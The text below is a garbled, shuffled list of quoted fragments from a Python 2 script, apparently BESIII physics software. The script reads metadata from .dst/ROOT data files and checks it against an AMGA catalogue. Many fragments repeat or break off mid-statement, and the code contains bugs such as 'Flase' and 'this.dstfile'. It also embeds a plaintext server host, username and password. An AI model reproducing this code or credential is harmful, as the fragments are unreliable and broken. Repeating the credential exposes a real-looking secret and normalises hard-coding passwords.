"\"m\" + expNumList[0] for expNum in expNumList[1:]: str = str + \"p+\" +",
"lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if runId in filename also is equal to runId in",
"runfrm = string.atoi(result[1]) runto = string.atoi(result[2]) for runid in runids: #check all runid",
"= format def __str__(self): return repr(\"the File's format is not \",self.format) #type of",
"expRes[\"resonance\"] = resList[0] else: #has several resonances,may be has something wrong to this",
"return result #get runIdList from JobOptions def getRunIdList(jobOptions): result = {} runIdList =",
"is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else: print \"Error %s:runL in filename",
"# print result runfrm = string.atoi(result[1]) runto = string.atoi(result[2]) for runid in runids:",
"by calling getFileSize function #get lfn by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile)",
"attributes[\"resonance\"] = expRes[\"resonance\"] #set RunH=RunId and RunL=RunId attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"]",
"== lfnInfo[\"runL\"]: if runH == lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"] #get",
"is null #-1 <=> value of streamId is null #null <=> value of",
"%d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set values of attribute status,streamId,Description #and these values are null",
"eventType == result[0]: return True return False #judge format of file class JudgeFormat(Exception):",
"\"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"] #set RunH=RunId and RunL=RunId attributes[\"runH\"] =",
"string import re import time #get number behiend string \"exp\" def getNum(expNum): format",
"expRes = {} expNumList = [] resList = [] #print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r')",
"== lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in",
"file naming rule, #file name like resonance_eventType_streamId_runL_runH_*.dst import os import os.path import ROOT",
"format of file is in srcformat if file.endswith(format): flag = 1 return flag",
"#create a new rootfile for dstfile os.symlink(dstfile,rootfile) return rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return",
"JudgeFormat(Exception): def __init__(self, format): self.format = format def __str__(self): return repr(\"the File's format",
"attributes attributes = {} expRes = {} runIds = [] #change the .dst",
"#for data/all name of file like run_0023454_All_file014_SFO-2.dst #for data/skim & mc, we use",
"[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return if os.path.exists(dstfile): #get file's",
"print \"Error %s:eventType %s in filename is not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\"",
"filename attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check eventType in filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists",
"\"error\" else: print \"Error %s:runL in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return",
"it if os.path.exists(rootfile): os.unlink(rootfile) #create a new rootfile for dstfile os.symlink(dstfile,rootfile) return rootfile",
"style to integer for i in items: if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] =",
"for entry in entries: #get name of each entry client.getattr(entry,['FILE']) result = client.getEntry()[1]",
"else: #has several resonances,may be has something wrong to this file print \"serveral",
"#get expNum and Resonance by calling getExpRes(runid) expRes = getExpRes(result[\"runIdList\"]) if expRes ==",
"if runfrm<=runid<=runto: #if this runid between runfrm and runto,and expNum isn't in expNumList",
"id isn't in resonance List,add it to resList if result[4] not in resList:",
"\"Content of this file is null:\",self.dstfile return \"error\" else: attributes = getCommonInfo(rootfile) #get",
"-1 del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes if __name__==\"__main__\": import time start=time.time() obj",
"flag==0: raise JudgeFormat(srcformat) return flag = checkFormat(destformat,rootfile) if flag==0: raise JudgeFormat(destformat) return #if",
"del attributes[\"jobOptions\"] return attributes #get resonance,runL,runH,eventType,streamId,LFN from file name #file name like resonance_eventType_streamId_runL_runH_*.dst",
"\"p+\" + getNum(expNum) expRes[\"expNum\"] = str return expRes #check whether eventType is stored",
"#store all attributes attributes = {} expRes = {} lfnInfo = {} runIds",
"in filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists == True: attributes[\"eventType\"] = lfnInfo[\"eventType\"] else:",
"if __name__==\"__main__\": import time start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time() print \"661:\",str(start",
"splitLFN(attributes[\"LFN\"],\"others\") #if runL is equal to runH,this file only has one runId if",
"of attribute status #-1 <=> value of status is null attributes[\"status\"] = -1",
"res is not None: return res.group() #Get expNum and resonance from ExpSearch according",
"commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch*",
"#check eventType in filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists == True: attributes[\"eventType\"] =",
"= re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2) if list is not None: #get a string",
"print result runfrm = string.atoi(result[1]) runto = string.atoi(result[2]) for runid in runids: #check",
"%s:eventType %s in filename is not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set values",
"value of status is null attributes[\"status\"] = -1 del attributes[\"runId\"] del attributes[\"jobOptions\"] return",
"#lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get attribute runId def splitLFN(lfn,type): result =",
"= expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"] #set RunH=RunId and RunL=RunId attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"]",
"flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return if os.path.exists(dstfile): #get file's size",
"status #-1 <=> value of status is null attributes[\"status\"] = -1 del attributes[\"runId\"]",
"False: print \"Error:\",this.dstfile return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"] if expRes[\"resonance\"]",
"first\" return Flase for item in entries: #for each entry,get its attributes in",
"getFileSize function #get name by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] =",
"in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:runH",
"runId from filename runId = splitLFN(attributes[\"LFN\"],\"all\") #compare runid of rootfile with runid in",
"re import time #get number behiend string \"exp\" def getNum(expNum): format = re.compile(r\"\\d+\")",
"exists,then delete it if os.path.exists(rootfile): os.unlink(rootfile) #create a new rootfile for dstfile os.symlink(dstfile,rootfile)",
"for i in items: if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] = runIdList return result",
"one resonance if len(resList) == 1: expRes[\"resonance\"] = resList[0] else: #has several resonances,may",
"client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch')",
"return \"error\" else: print \"Error %s:runH in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH)",
"mdclient,mdinterface import string import re import time #get number behiend string \"exp\" def",
"res1 is not None: #get a string like:RunIdList={-10513,0,-10629} str2 = res1.group() result[\"description\"] =",
"name like resonance_eventType_streamId_runL_runH_*.dst import os import os.path import ROOT from ROOT import gROOT",
"in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1] # print item # print result runfrm",
"getExpRes(runIds) expRes = getExpRes(runIds) if expRes == False: print \"Can't get expNum and",
"attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"] else: print \"runId of %s,in filename is",
"def getCommonInfo(rootfile): commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1",
"expNum isn't in expNumList #add this expNum to expNumList if result[3] not in",
"same as resonance that get from ExpSearch if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] =",
"def getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return if",
"rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0:",
"ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:in the filename,runL = runH",
"return os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get attribute runId def splitLFN(lfn,type):",
"attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check eventType in filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists ==",
"= \"m\" + expNumList[0] for expNum in expNumList[1:]: str = str + \"p+\"",
"items[0] result[\"eventType\"] = items[1] result[\"streamId\"] = items[2] result[\"runL\"] = string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4])",
"all entries under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0] while entry: entries.append(entry) entry",
"expRes[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return",
"with name of each entry if eventType == result[0]: return True return False",
"is not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set values of attribute status #-1",
"Boss version, runid, Entry number, JobOptions from root file def getCommonInfo(rootfile): commoninfo =",
"{} expNumList = [] resList = [] #print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client =",
"is in srcformat if file.endswith(format): flag = 1 return flag #Before reading information",
"'stream0' attributes[\"description\"] = 'null' del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes #get resonance,runL,runH,eventType,streamId,LFN from",
"= mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] for",
"tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo",
"else: #this dst file has several runIds,get them from JobOptions by calling getRunIdList",
"= 'stream0' attributes[\"description\"] = 'null' del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes #get resonance,runL,runH,eventType,streamId,LFN",
"is empty, please run createBesDir first\" return Flase for item in entries: #for",
"be has something wrong to this file print \"serveral resonance:\",resList return False #only",
"__init__(self, format): self.format = format def __str__(self): return repr(\"the File's format is not",
"new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()')",
"expNum and resonance from ExpSearch according runids def getExpRes(runids): entries = [] expRes",
"-*- coding:utf-8 -*- # author: linlei #for data/all name of file like run_0023454_All_file014_SFO-2.dst",
"#if runId in filename also is equal to runId in rootfile if attributes[\"runId\"]",
"= \"null\" #if resonance in filename is same as resonance that get from",
"if items[2] == \"All\": runId = string.atoi(items[1]) return runId else: result[\"resonance\"] = items[0]",
"expNum and resonance of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"] =",
"JobOptions def getRunIdList(jobOptions): result = {} runIdList = [] str1=jobOptions[0] pat = re.compile(r'RunIdList=",
"entry: entries.append(entry) entry = client.getEntry()[0] if entries is None: print \"ExpSearch directory is",
"lfnInfo[\"eventType\"] else: print \"Error %s:eventType %s in filename is not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"])",
"DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self): #store all",
"is string,we need to change their style to integer for i in items:",
"= list(i for i in ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst' return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum,",
"calling getRunIdList function result = getRunIdList(attributes[\"jobOptions\"]) if result is not None: runH =",
"expNumList = [] resList = [] #print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root')",
"if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"] else: print \"Error %s:resonance in filename",
"mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0] while entry:",
"client.getEntry()[1] # print item # print result runfrm = string.atoi(result[1]) runto = string.atoi(result[2])",
"expNum to expNumList if result[3] not in expNumList: expNumList.append(result[3]) #resonance of this id",
"by calling getExpRes(runid) expRes = getExpRes(result[\"runIdList\"]) if expRes == False: print \"Error:\",this.dstfile return",
"like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get attribute runId def splitLFN(lfn,type): result = {}",
"re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 = pat.search(str1) if res1 is not None: #get a string",
"AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set values of attribute status #-1 <=> value of status",
"attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in filename by calling splitLFN",
"in the root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else: #this dst file has",
"client.getEntry()[1] #compare eventType with name of each entry if eventType == result[0]: return",
"coding:utf-8 -*- # author: linlei #for data/all name of file like run_0023454_All_file014_SFO-2.dst #for",
"these expNum into mexpN1pN2p... sorted(expNumList) str = \"m\" + expNumList[0] for expNum in",
".dst files of Data/All,their EventType are \"all\" attributes[\"eventType\"] = \"all\" #get runId from",
"dstfile by \"/\",then get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split \"*.dst\" by \".\" #get",
"\"/\",then get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split \"*.dst\" by \".\" #get lfn lfn",
"= lfnInfo[\"runH\"] #get expNum and Resonance by calling getExpRes(runid) expRes = getExpRes(result[\"runIdList\"]) if",
"in expNumList #add this expNum to expNumList if result[3] not in expNumList: expNumList.append(result[3])",
"and resonance of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"]",
"{} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");')",
"#file name like resonance_eventType_streamId_runL_runH_*.dst import os import os.path import ROOT from ROOT import",
"= abs(ROOT.evtHeader.getRunId()) #get all entries commoninfo[\"eventNum\"] = ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i",
"flag = checkFormat(srcformat,dstfile) if flag==0: raise JudgeFormat(srcformat) return flag = checkFormat(destformat,rootfile) if flag==0:",
"file is null:\",self.dstfile return \"error\" else: attributes = getCommonInfo(rootfile) #get filesize by calling",
"expNum and resonance of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] =",
"str2 pat = re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2) if list is not None: #get",
"new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss Version commoninfo[\"bossVer\"] =",
"runIdList return result #get Boss version, runid, Entry number, JobOptions from root file",
"= checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return if os.path.exists(dstfile): #get file's size return",
"#get runId from filename runId = splitLFN(attributes[\"LFN\"],\"all\") #compare runid of rootfile with runid",
"entries under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0] while entry: entries.append(entry) entry =",
"gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();')",
"def __init__(self, format): self.format = format def __str__(self): return repr(\"the File's format is",
"= new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss Version commoninfo[\"bossVer\"]",
"jobInfo = new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);')",
"= string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4]) return result #get runIdList from JobOptions def getRunIdList(jobOptions):",
"from filename runId = splitLFN(attributes[\"LFN\"],\"all\") #compare runid of rootfile with runid in filename",
"each entry #under catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if this runid between runfrm and",
"like run_0009947_All_file001_SFO-1,get attribute runId def splitLFN(lfn,type): result = {} items = lfn.split(\"_\") if",
"lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if runL is equal to runH,this file only has one",
"= re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 = pat.search(str1) if res1 is not None: #get a",
"return \"error\" else: attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize function #get",
"= [] #change the .dst file to .root file rootfile = changeFormat(self.dstfile,self.rootfile) if",
"format = re.compile(r\"\\d+\") res = format.search(expNum) if res is not None: return res.group()",
"from rootfile class Others(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def",
"this runid between runfrm and runto,and expNum isn't in expNumList #add this expNum",
"getExpRes(result[\"runIdList\"]) if expRes == False: print \"Error:\",this.dstfile return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"]",
"items: if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] = runIdList return result #get Boss version,",
"in filename also is equal to runId in rootfile if attributes[\"runId\"] == lfnInfo[\"runL\"]:",
"#print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries under catalog \"/BES3/ExpSearch\"",
"for runid in runids: #check all runid whether between runfrm and runto of",
"in amga def eventTypeCheck(eventType): entries = [] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root')",
"in entries: #get name of each entry client.getattr(entry,['FILE']) result = client.getEntry()[1] #compare eventType",
"return lfn #get size of dst file def getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag =",
"expNumList if result[3] not in expNumList: expNumList.append(result[3]) #resonance of this id isn't in",
"= client.getEntry()[0] for entry in entries: #get name of each entry client.getattr(entry,['FILE']) result",
"attributes attributes = {} expRes = {} lfnInfo = {} runIds = []",
"%s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:in the filename,runL = runH = %d,but",
"True: attributes[\"eventType\"] = lfnInfo[\"eventType\"] else: print \"Error %s:eventType %s in filename is not",
"filename.split('.')[0] return lfn #get size of dst file def getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag",
"if attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"] #get expNum",
"expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"] else: print \"Error %s:resonance in filename is",
"lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"] #get expNum and Resonance by calling getExpRes(runid) expRes =",
"return attributes #get resonance,runL,runH,eventType,streamId,LFN from file name #file name like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum",
"expNumList[0] else: #if including several expNums,combine these expNum into mexpN1pN2p... sorted(expNumList) str =",
"in entries: #for each entry,get its attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1]",
"result is not None: runH = max(result[\"runIdList\"]) runL = min(result[\"runIdList\"]) if runL ==",
"file name #file name like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by reading information from rootfile",
"#get a string like:-10513,0,-10629 runIds = list.group() #split runIds according ',' items=runIds.split(',') #members'",
"#commoninfo[\"TotEvtNo\"] = list(i for i in ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"] = list(i for",
"return expRes #check whether eventType is stored in eventTypeList in amga def eventTypeCheck(eventType):",
"in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:in",
"calling getFileSize function #get name by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"]",
"reading information from rootfile class Others(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile =",
"by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in",
"= rootfile def getAttributes(self): #store all attributes attributes = {} expRes = {}",
"= ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get all entries commoninfo[\"eventNum\"] = ROOT.num",
"if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"] else: print \"Error %s:resonance in filename",
"filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else: print \"Error %s:runL in",
"file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = \"null\" #if resonance in filename",
"lfn lfn = filename.split('.')[0] return lfn #get size of dst file def getFileSize(dstfile,format",
"that get from ExpSearch if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"] else: print",
"entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] if entries is None:",
"return repr(\"the File's format is not \",self.format) #type of srcformat is list,it includes",
"if flag==0: raise JudgeFormat(destformat) return #if this rootfile has exists,then delete it if",
"items[2] result[\"runL\"] = string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4]) return result #get runIdList from JobOptions",
"#get lfn by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #get",
"= items[2] result[\"runL\"] = string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4]) return result #get runIdList from",
"= 'null' del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes #get resonance,runL,runH,eventType,streamId,LFN from file name",
"= client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] if entries is None: print",
"\"error\" else: attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize function #get name",
"getRunIdList(jobOptions): result = {} runIdList = [] str1=jobOptions[0] pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1",
"gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo*",
"= str2 pat = re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2) if list is not None:",
"catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if this runid between runfrm and runto,and expNum isn't",
"resonances,may be has something wrong to this file print \"serveral resonance:\",resList return False",
"None: runH = max(result[\"runIdList\"]) runL = min(result[\"runIdList\"]) if runL == lfnInfo[\"runL\"]: if runH",
"= getLFN(self.dstfile) #for .dst files of Data/All,their EventType are \"all\" attributes[\"eventType\"] = \"all\"",
"\"Error:\",this.dstfile return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"] if expRes[\"resonance\"] == lfnInfo[\"resonance\"]:",
"root file def getCommonInfo(rootfile): commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");')",
"commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get all entries commoninfo[\"eventNum\"] = ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"] =",
"[] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0] while entry:",
"result[0]: return True return False #judge format of file class JudgeFormat(Exception): def __init__(self,",
"= client.getEntry()[0] if entries is None: print \"ExpSearch directory is empty, please run",
"is equal to runH,this file only has one runId if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]:",
"= expRes[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"])",
".dst file to .root file rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print \"Content of",
"\"error\" else: print \"Error %s:in the filename,runL = runH = %d,but runId in",
"= checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return #split dstfile by \"/\",then get \"lfn.dst\"",
"entry: entries.append(entry) entry = client.getEntry()[0] for entry in entries: #get name of each",
"string,we need to change their style to integer for i in items: if",
"os.path.exists(dstfile): #get file's size return os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get",
"+ expNumList[0] for expNum in expNumList[1:]: str = str + \"p+\" + getNum(expNum)",
"attributes[\"resonance\"] = expRes[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in ExpSearch is",
"rootfile def getAttributes(self): #store all attributes attributes = {} expRes = {} runIds",
"resonance of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"] #set",
"of status is null #-1 <=> value of streamId is null #null <=>",
"format): self.format = format def __str__(self): return repr(\"the File's format is not \",self.format)",
"according runids def getExpRes(runids): entries = [] expRes = {} expNumList = []",
"string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4]) return result #get runIdList from JobOptions def getRunIdList(jobOptions): result",
"resList[0] else: #has several resonances,may be has something wrong to this file print",
"-1 attributes[\"streamId\"] = 'stream0' attributes[\"description\"] = 'null' del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes",
"list(i for i in ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"] = list(i for i in",
"we use new file naming rule, #file name like resonance_eventType_streamId_runL_runH_*.dst import os import",
"= filename.split('.')[0] return lfn #get size of dst file def getFileSize(dstfile,format = [\".dst\",\".tag\"]):",
"not None: return res.group() #Get expNum and resonance from ExpSearch according runids def",
"expRes = getExpRes(runIds) if expRes == False: print \"Can't get expNum and resonance",
"evtType_exists == True: attributes[\"eventType\"] = lfnInfo[\"eventType\"] else: print \"Error %s:eventType %s in filename",
